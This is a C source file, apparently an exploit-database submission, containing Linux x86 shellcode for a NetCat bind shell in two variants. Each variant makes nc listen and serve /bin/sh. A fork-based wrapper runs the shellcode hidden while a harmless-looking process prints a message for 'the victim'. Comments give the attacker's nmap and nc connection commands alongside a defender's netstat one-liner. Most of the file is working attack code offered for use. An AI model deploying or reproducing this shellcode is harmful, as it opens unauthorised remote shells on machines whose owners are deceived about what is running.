#include <stdio.h>
#include <string.h>
#include <unistd.h> //| needed for C "fork"
#include <stdlib.h> //| needed for C "system"
 
 
//| Exploit Title: [Linux x86 NetCat bind shell with Port (44, 52 bytes)]
//| Date: [7/28/2016]
//| Exploit Author: [CripSlick]
//| Tested on: [Kali 2.0 x86]
//| Version: [NetCat v1.10-41]
 
//| ShepherdDowling@gmail.com
//| OffSec ID: OS-20614
//| http://50.112.22.183/
 
 
//|=====================================================================================================
//|================================ CripSlick's Short NetCat Bind Shell ================================
//|
//|
//| Why use CripSlick's NetCat Bind Shell?
//| Because it is short and that is about the only reason. If you can spare some bytes, I highly 
//| suggest that you go with my Ncat Bind Shell that has the added benefits of SSL, persistent,
//| multi-terminal with a password >>>>>>>>>>>>>> https://www.exploit-db.com/exploits/40061/
//| Or if you must only rely on syscalls, go >>>>   https://www.exploit-db.com/exploits/40122/ 
//| for my bind shell that is also, persistent, multiterminal with a password (Ncat is better 
//| due to SSL, so if you know the victim has it on their machine use it.)
//| 
//|
//| Sometimes we don't have the luxury of being able to have the other goodies so you must make do  
//| with a less powerful approach to at least get your foot in the door, and that is why I made this.
//| 
//| Defender Bash Script    
//| netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"
//|
//| I came up with this bash script because I wanted to be able to see who was spying that included
//| TCP listening, TCP established, UDP listening, & UDP established.
//| I found it annoying that some people needed to run a new script for every state so I fixed that.
//| the "-A 50" means your bash script will hold up to 50 connections.
//| If you need more connections increase the number, and if the scan is slow, decrease the number.
         
 
 
 
#define PORT        "\x39\x38"  // FORWARD BYTE ORDER (ASCII TO HEX)
//|                 PORT:98         
 
//| Specifying the PROTOCOL Only Applies to CODE2
//#define PROTOCOL  "\x76\x76"  // TCP & IS terminal visible
#define PROTOCOL    "\x75\x75"  // UDP & NOT terminal visible   
 
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================
//| ==============================================================================
//| CODE1 Random Port, real ghetto but only 44 bytes!!
//| ==============================================================================
//| Attacker Finds Port: nmap 10.1.1.4 -p-
//| Attacker Connects via TCP: nc <IP> <PORT>
//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"
 
 
unsigned char CODE1[] = //replace CODE1 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
 
"\x31\xc0\x31\xd2\x50\x68\x6e\x2f\x73\x68\x68\x65\x2f\x62\x69\x68\x2d"
"\x6c\x76\x76\x89\xe6\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x56\x53\x89\xe1\xb0\x0b\xcd\x80"
;
 
 
//|=====================!!!CHOSE ONLY ONE SHELLCODE!!!============================
//| ==============================================================================
//| CODE2 with port and still only 52 bytes
//| ==============================================================================
//| Attacker Connects via TCP: nc <IP> <PORT>
//| Attacker Connects via UDP: nc -u <IP> <PORT>
//| Defender : netstat -an | grep -A 50 Recv-Q | egrep "tcp|udp"
 
 
unsigned char CODE2[] = //replace CODE2 for both CODEX   <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
 
 
"\x31\xdb\xf7\xe3\x68\x2d\x70"PORT"\x89\xe7\x50\x68\x6e\x2f\x73\x68\x68"
"\x65\x2f\x62\x69\x68\x2d\x6c"PROTOCOL"\x89\xe6\x50\x68\x2f\x2f\x6e\x63"
"\x68\x2f\x62\x69\x6e\x89\xe3\x50\x57\x56\x53\x89\xe1\xb0\x0b\xcd\x80"
;
 
 
 
//|========================== VOID SHELLCODE ======================================
void SHELLCODE()
{
//  This part floods the registers to make sure the shellcode will always run
    __asm__("mov $0xAAAAAAAA, %eax\n\t"
        "mov %eax, %ebx\n\t" "mov %eax, %ecx\n\t" "mov %eax, %edx\n\t"
        "mov %eax, %esi\n\t" "mov %eax, %edi\n\t" "mov %eax, %ebp\n\t"
        "call CODE2");  //1st CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
}
 
//|========================== VOID printBytes =====================================
void printBytes()
{
printf("CripSlick's code is %d Bytes Long\n",
        strlen(CODE2)); //2nd CODEX<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
}
 
 
//|============================== Int main ========================================
int main ()
{
     
//  IMPORTANT> replace CODEX  the "unsigned char" variable  above
//  > This needs to be done twice (for string count + code to use)
 
int pid = fork();       // fork start
    if(pid == 0){       // pid always starts at 0
     
    SHELLCODE();        // launch void SHELLCODE
                        // this is to represent a scenario where you bind to a good program
                        // you always want your shellcode to run first  
     
    }else if(pid > 0){   // pid will always be greater than 0 after the 1st process
                        // this argument will always be satisfied
     
    printBytes();       // launch printBYTES
                        // pretend that this is the one the victim thinks he is only using
    }
return 0;               // satisfy int main
system("exit");         // keeps our shellcode a daemon. This only works with C0DE2 as UDP
}